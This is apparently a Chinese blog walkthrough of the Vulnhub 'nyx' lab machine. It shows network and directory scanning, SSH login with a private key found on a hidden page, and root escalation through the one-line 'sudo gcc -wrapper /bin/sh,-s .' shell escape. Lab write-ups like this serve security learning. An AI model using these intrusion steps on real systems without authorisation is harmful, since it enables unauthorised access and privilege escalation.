Vulnhub nyx靶机渗透记录

    科技2025-10-26  3

    环境配置

    nyx靶机镜像地址:http://www.vulnhub.com/entry/nyx-1,535/ Kali Linux IP: 192.168.1.128 nyx IP:192.168.1.137

    信息收集

    利用arp-scan,扫描本地局域网主机: arp-scan -l

    利用nmap常规扫描目标主机: nmap -A -p- 192.168.1.137

    利用dirb对站点目录进行枚举: dirb http://192.168.1.137

    然而并没有找到有价值的界面,尝试访问http://192.168.1.137 没有任何有用的线索,对ssh进行暴力破解没有结果。

    查了nmap的高级用法,利用nmap的http-enum脚本对80端口再次扫描: nmap -p80 --script=http-enum 192.168.1.137

    发现可疑站点:http://192.168.1.137/d41d8cd98f00b204e9800998ecf8427e.php 站点标题为:mpampis key

    漏洞利用

    信息收集所得,看起来是mpampis用户的ssh私钥,尝试ssh免密登录: 创建私钥文件,复制数据保存,并修改权限: touch id_rsa gedit id_rsa

    chmod 600 id_rsa

    尝试使用私钥免密登录: ssh -i id_rsa mpampis@192.168.1.137

    成功getshell!! 在当前用户目录下找到user.txt:

    权限提升

    运行sudo -l 查看用户权限: sudo -l

    发现有一个gcc的特权,到站点:https://gtfobins.github.io/ 查询是否有可用提权方法。

    sudo gcc -wrapper /bin/sh,-s .

    提权成功:

    Processed: 0.011, SQL: 8